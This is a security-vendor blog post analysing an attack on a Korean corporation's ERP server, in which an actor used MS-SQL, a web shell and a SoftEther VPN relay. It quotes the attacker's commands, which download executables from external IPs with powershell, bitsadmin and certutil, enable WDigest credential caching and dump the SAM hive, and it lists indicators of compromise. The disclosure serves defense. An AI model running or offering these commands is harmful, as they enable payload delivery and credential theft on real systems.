Analysis of Attack Case Installing SoftEther VPN on Korean ERP Server

AhnLab SEcurity intelligence Center (ASEC) has recently discovered an attack case where a threat actor attacked the ERP server of a Korean corporation and installed a VPN server. In the initial compromise process, the threat actor attacked the MS-SQL service and later installed a web shell to maintain persistence and control the infected system. They then ultimately installed SoftEther VPN to utilize the infected system as a VPN server.

1. Proxy and VPN Services

Proxy and VPN are technologies that relay communication through intermediary servers. Users can use these for external communications to enhance privacy and security and bypass regional restrictions. Because these can also provide advantages for threat actors, they often use various Proxy and VPN tools in attacks. Threat actors such as APT groups or ransomware gangs which aim to compromise the internal networks of the attack targets use various tools including FRP [1] and HTran [2] in the attack process.

There are also cases where threat actors self-develop malware instead of using known tools. For example, SystemBC is a proxy bot that supports the Socks5 proxy function. If the threat actor is able to install SystemBC in an accessible system within the organization’s internal network, they will be able to use SystemBC to access the internal network from outside. [3]

Another case is Bunitu. According to Malwarebytes, the threat actor infected numerous systems through a malvertising campaign and installed Bunitu, a proxy bot, before selling access to infected systems to VPN companies. This process allowed VPN companies to use infected systems installed with Bunitu as relay servers to provide VPN services to their users. [4]

While there are many attack cases where proxy tools and malware strains are used, there are cases where VPN services are installed. Out of the VPN tools used in attacks, SoftEther VPN, an open-source program, is the one that is often used. For example, an article by Microsoft revealed that the GALLIUM operator installed a SoftEther VPN server in the attack target’s network to access the internal network through SoftEther VPN. [5] There are also other well-known cases where SoftEther VPN was installed, including the attack case by the ToddyCat threat actor shared by Kaspersky [6] and the attack process of UNC3500 shared by Mandiant. [7]

2. Analysis of Attack Case

Recently, an attack case targeting the ERP server of a Korean corporation was discovered. It is deemed that initial infiltration occurred through attacking a poorly managed MS-SQL server. The threat actor used the following commands to scan the network and determine whether subsequent attacks would be possible.

> ping -n 10
> whoami
> ipconfig
> hostname
> tasklist
> query user
> netstat -ano -p tcp

The file “vmtoolsd1.exe” that the threat actor attempted to install is believed to be a legitimate file as the MS VisualStudio Code program was downloaded to the same directory. The process was done likely to test whether additional payloads can be downloaded before finally launching the attack.

> powershell (new-object System.Net.WebClient).DownloadFile( ‘hxxp://45.77.44[.]127/vmtoolsd.exe’,’C:\ProgramData\vmtoolsd1.exe’)”
> bitsadmin /transfer MyDownloadJob1 hxxp://45.77.44[.]127/vmtoolsd.exe C:\ProgramData\vmtoolsd1.exe
> certutil -urlcache -sploit -f hxxp://45.77.44[.]127/vmtoolsd.exe
> certutil -urlcache -split -f hxxp://167.99.75[.]170/vmtoolsd.exe
> bitsadmin /transfer MyDownloadJob1 hxxp://167.99.75[.]170/vmtoolsd.exe C:\ProgramData\vmtoolsd1.exe

After the test was complete, the threat actor used the following commands to install a web shell using “”. Once the download was successful, the file was deleted and could not be procured. However, logs of commands being executed afterward through the web server process were found, meaning that the web shell was probably installed successfully.

Figure 1. Commands for installing the web shell

After installing the web shell, the threat actor used it to execute commands. Most confirmed commands were those for stealing account credentials stored in the system.

> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
> reg save hklm\sam sam.hive /y

Then the threat actor downloaded and executed the following batch file. The batch file is a downloader responsible for installing the SoftEther VPN server under the name “sqlwrite1.exe”. For reference, “hamcore.se2” is a data file needed for the installation process and “vpn_server.config” is a configuration file.

Figure 2. Command execution using the web shell
Figure 3. The batch malware installing the SoftEther VPN server

It appears that the threat actor not only plans to simply use the target ERP server as a VPN server. The configuration file used by the threat actor runs as a “cascade connection” method where the server does not provide a standalone VPN service but is connected to another VPN server. Thus it is deemed that the threat actor is using the server to build a C&C infrastructure to enhance security and privacy and hinder the process of tracking the actual C&C.

Figure 4. The SoftEther VPN configuration file that connects to another VPN server

3. Conclusion

Recently, an attack case was found where the threat actor attacked a Korean ERP server and built a VPN server. It is deemed that initial infiltration occurred through an MS-SQL server where the account credentials were being poorly managed.

Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks. They should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. If these measures are not taken in advance, continuous infections by threat actors and malware can occur.

File Detection
– Downloader/BAT.Agent.SC199990 (2024.06.08.00)
– Data/BIN.Config (2024.06.10.02)

Behavior Detection
– CredentialAccess/MDP.Mimikatz.M4367
– Execution/MDP.Powershell.M4624
– Execution/MDP.Certutil.M4771


– aac76af38bfd374e83aef1326a9ea8ad: Downloader Batch (tun02.bat)
– ef340716a83879736e486f331d84a7c6: SoftEther Config (vpn_server.config)

C&C Server
– 45.76.53[.]110:443: VPN server

Download URLs
– hxxp://45.77.44[.]127/vmtoolsd.exe
– hxxp://116.202.251[.]4/vmtoolsd.exe
– hxxp://167.99.75[.]170/vmtoolsd.exe
– hxxps://bashupload[.]com/-nsU2/1.txt
– hxxp://167.99.75[.]170/tun02.bat
– hxxp://167.99.75[.]170/dns003/hamcore.se2
– hxxp://167.99.75[.]170/dns003/sqlwritel.exe
– hxxp://167.99.75[.]170/tun02/vpn_server.config

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Analysis of Attack Case Installing SoftEther VPN on Korean ERP Server appeared first on ASEC BLOG.

Article Link: Analysis of Attack Case Installing SoftEther VPN on Korean ERP Server - ASEC BLOG